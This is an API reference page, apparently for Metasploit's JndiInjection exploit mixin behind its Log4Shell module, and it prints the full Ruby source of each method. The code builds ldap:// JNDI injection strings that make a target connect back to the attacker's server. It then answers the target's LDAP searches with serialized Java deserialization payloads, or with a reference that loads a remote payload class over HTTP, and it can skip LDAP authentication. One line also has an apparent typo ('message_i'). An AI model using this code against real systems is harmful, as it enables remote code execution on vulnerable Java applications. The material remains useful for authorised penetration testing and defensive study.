Module: Msf::Exploit::Remote::JndiInjection

Includes:
Java, JavaDeserialization, LDAP::Server
Included in:
Log4Shell
Defined in:
lib/msf/core/exploit/remote/jndi_injection.rb

Instance Attribute Summary

Attributes included from LDAP::Server

#service

Attributes included from SocketServer

#service

Instance Method Summary collapse

Methods included from LDAP::Server

#on_send_response, #read_ldif, #start_service

Methods included from SocketServer

#_determine_server_comm, #bindhost, #bindport, #cleanup, #cleanup_service, #exploit, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvhost_addr, #srvport, #start_service, #via_string

Methods included from JavaDeserialization

gadget_chains, #generate_java_deserialization_for_command, #generate_java_deserialization_for_payload

Methods included from Powershell

#bypass_powershell_protections, #cmd_psh_payload, #compress_script, #decode_script, #decompress_script, #encode_script, #generate_psh_args, #generate_psh_command_line, #make_subs, #process_subs, #read_script, #run_hidden_psh

Methods included from Java

#build_jar, #compile, #init_jvm, #query_jvm, #save_to_file, #serialized_class_from_jar, #sign_jar

Instance Method Details

#build_ldap_search_response(msg_id, base_dn) ⇒ Array

Generate and serialize the payload as an LDAP search response

Parameters:

  • msg_id (Integer)

    LDAP message identifier

  • base_dn (String)

    LDAP distinguished name

Returns:

  • (Array)

    packed BER sequence



92
93
94
95
96
97
98
99
 
# File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 92

def build_ldap_search_response(msg_id, base_dn)
  attrs = build_ldap_search_response_payload
  appseq = [
    base_dn.to_ber,
    attrs.to_ber_sequence
  ].to_ber_appsequence(Net::LDAP::PDU::SearchReturnedData)
  [ msg_id.to_ber, appseq ].to_ber_sequence
end

#build_ldap_search_response_payloadArray

Build the LDAP response to the search request that contains the serialized payload.

Returns:

  • (Array)

    the array of attributes to add to the returned search data of the query response.



105
106
107
108
109
 
# File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 105

def build_ldap_search_response_payload
  # exploit authors should override this and either call the inline one with a gadget chain that is compatible with
  # the target or setup an HTTP server and call the remote one
  build_ldap_search_response_payload_inline('BeanFactory')
end

#build_ldap_search_response_payload_inline(gadget_chain) ⇒ Array

Build the LDAP response to the search request that contains the serialized payload to be executed.

Parameters:

  • gadget_chain (String)

    The gadget chain to use to execute the payload. This value must be compatible with the target application.

Returns:

  • (Array)

    the array of attributes to add to the returned search data of the query response.



117
118
119
120
121
122
123
 
# File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 117

def build_ldap_search_response_payload_inline(gadget_chain)
  java_payload = generate_java_deserialization_for_payload(gadget_chain, payload)
  [
    [ 'javaClassName'.to_ber, [ rand_text_alphanumeric(8..15).to_ber ].to_ber_set ].to_ber_sequence,
    [ 'javaSerializedData'.to_ber, [ java_payload.to_ber ].to_ber_set ].to_ber_sequence
  ]
end

#build_ldap_search_response_payload_remote(pay_url, pay_class = 'metasploit.PayloadFactory') ⇒ Array

Build the LDAP response to the search request that contains a reference to an HTTP server from which a remote class will be loaded. The target must have the trusted code base option enabled for this technique to work. The HTTP server from which the class is hosted is not managed by this method.

Parameters:

  • pay_url (String)

    The URL from which the class should be loaded.

  • pay_class (String) (defaults to: 'metasploit.PayloadFactory')

    The payload class name.

Returns:

  • (Array)

    the array of attributes to add to the returned search data of the query response.



133
134
135
136
137
138
139
140
 
# File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 133

def build_ldap_search_response_payload_remote(pay_url, pay_class = 'metasploit.PayloadFactory')
  [
    [ 'javaClassName'.to_ber, [ pay_class.to_ber].to_ber_set ].to_ber_sequence,
    [ 'javaFactory'.to_ber, [ pay_class.to_ber].to_ber_set ].to_ber_sequence,
    [ 'objectClass'.to_ber, [ 'javaNamingReference'.to_ber ].to_ber_set ].to_ber_sequence,
    [ 'javaCodebase'.to_ber, [ pay_url.to_ber ].to_ber_set ].to_ber_sequence,
  ]
end

#initialize(info = {}) ⇒ Object 



18
19
20
21
22
23
24
25
26
27
28
29
30
31
 
# File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 18

def initialize(info = {})
  super(update_info(info,
    'Stance' => Msf::Exploit::Stance::Aggressive))

  register_options(
    [
      OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
    ]
  )

  register_advanced_options([
    OptBool.new('LDAP_AUTH_BYPASS', [true, 'Ignore LDAP client authentication', true])
  ])
end

#jndi_string(resource = nil) ⇒ String

Create the JNDI injection string that will trigger an LDAP connection back to Metasploit.

Returns:

  • (String)

    the JNDI string



36
37
38
39
 
# File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 36

def jndi_string(resource = nil)
  resource ||= "dc=#{Rex::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}"
  "ldap://#{Rex::Socket.to_authority(srvhost_addr, datastore['SRVPORT'])}/#{resource}"
end

#on_dispatch_request(client, data) ⇒ Object

LDAP service callbacks

Handle incoming requests via service mixin



45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
 
# File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 45

def on_dispatch_request(client, data)
  return if data.strip.empty?

  data.extend(Net::BER::Extensions::String)
  begin
    pdu = Net::LDAP::PDU.new(data.read_ber!(Net::LDAP::AsnSyntax))
    vprint_status("LDAP request data remaining: #{data}") unless data.empty?
    resp = case pdu.app_tag
           when Net::LDAP::PDU::BindRequest # bind request
             client.authenticated = true
             service.encode_ldap_response(
               pdu.message_id,
               Net::LDAP::ResultCodeSuccess,
               '',
               '',
               Net::LDAP::PDU::BindResult
             )
           when Net::LDAP::PDU::SearchRequest # search request
             if client.authenticated || datastore['LDAP_AUTH_BYPASS']
               client.write(build_ldap_search_response(pdu.message_id, pdu.search_parameters[:base_object]))
               service.encode_ldap_response(pdu.message_id, Net::LDAP::ResultCodeSuccess, '', 'Search success', Net::LDAP::PDU::SearchResult)
             else
               service.encode_ldap_response(pdu.message_i, 50, '', 'Not authenticated', Net::LDAP::PDU::SearchResult)
             end
           when Net::LDAP::PDU::UnbindRequest
             vprint_status("Client sent unbind request")
             nil # close client, no response can be sent over unbound comm
           else
             vprint_status("Client sent unexpected request #{pdu.app_tag}")
             nil # close client, can't handle the unknown
           end
    resp.nil? ? client.close : on_send_response(client, resp)
  rescue StandardError => e
    print_error("Failed to handle LDAP request due to #{e}")
    client.close
  end

  resp
end

#validate_configuration!Object 



142
143
 
# File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 142

def validate_configuration!
end